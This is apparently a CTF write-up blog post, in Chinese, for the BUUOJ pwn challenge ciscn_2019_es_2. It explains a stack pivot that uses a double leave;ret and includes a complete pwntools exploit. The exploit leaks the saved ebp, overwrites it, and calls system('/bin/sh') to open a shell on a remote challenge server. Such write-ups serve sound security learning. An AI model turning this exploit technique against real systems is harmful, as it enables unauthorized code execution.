pwn | ciscn_2019_es_2
pwn | ciscn_2019_es_2
x86 ret2text 栈迁移
这是我第一次做栈迁移的题目,浅浅记录一下思路
关键的利用点在于利用leave ret的组合把esp搬到低地址的地方(也就是我们输入的地方)
这题有两次输入,第一次通过溢出获取ebp地址上的值,也就是原ebp的地址
这时候先覆盖ebp地址上原ebp的值为输入的起始地址,然后让程序跳转到leave ret
关键点就在这里了
这时候第一次执行leave ret,leave:mov esp, ebp; pop ebp;
pop出来的ebp值是我们输入的起始地址
然后ret 到leave ret再次执行
第二次leave: mov esp, ebp; 就是这里,将esp也搬到了ebp的地方,也就是输入的起始地址
然后pop ebp,这时候esp指向的就是输入地址+4的位置,也就是新的返回值地址用于ret,剩下的不用多说了,就是常规操作。
exp:
from pwn import *
context.log_level = 'debug'
elf = ELF('ciscn_2019_es_2')
# p = process('ciscn_2019_es_2')
p = remote("node4.buuoj.cn", 28653)
p.recvuntil('name?')
# leak ebp
payload = 0x28 * b'M'
p.send(payload)
p.recvuntil(0x28*b'M')
ebp = u32(p.recv(4))
print(hex(ebp))
p.recv()
p_leaveret = 0x080485FD
p_system = elf.plt['system']
p_str = ebp - 0x38 # old ebp - 0x38 = input addr
p_binsh = p_str + 16
'''
ebp-0x28 -> s: xxxx
ebp -> old ebp
ebp+4 -> old eip
leave ret
'''
payload = (b'M'*4 + p32(p_system) + b'MMMM' + p32(p_binsh) + b'/bin/sh\x00' ).ljust(0x28, b'A') + p32(p_str) + p32(p_leaveret)
p.send(payload)
p.interactive()
本文来自博客园,作者:Mz1,转载请注明原文链接:https://www.cnblogs.com/Mz1-rc/p/16949046.html
如果有问题可以在下方评论或者email:mzi_mzi@163.com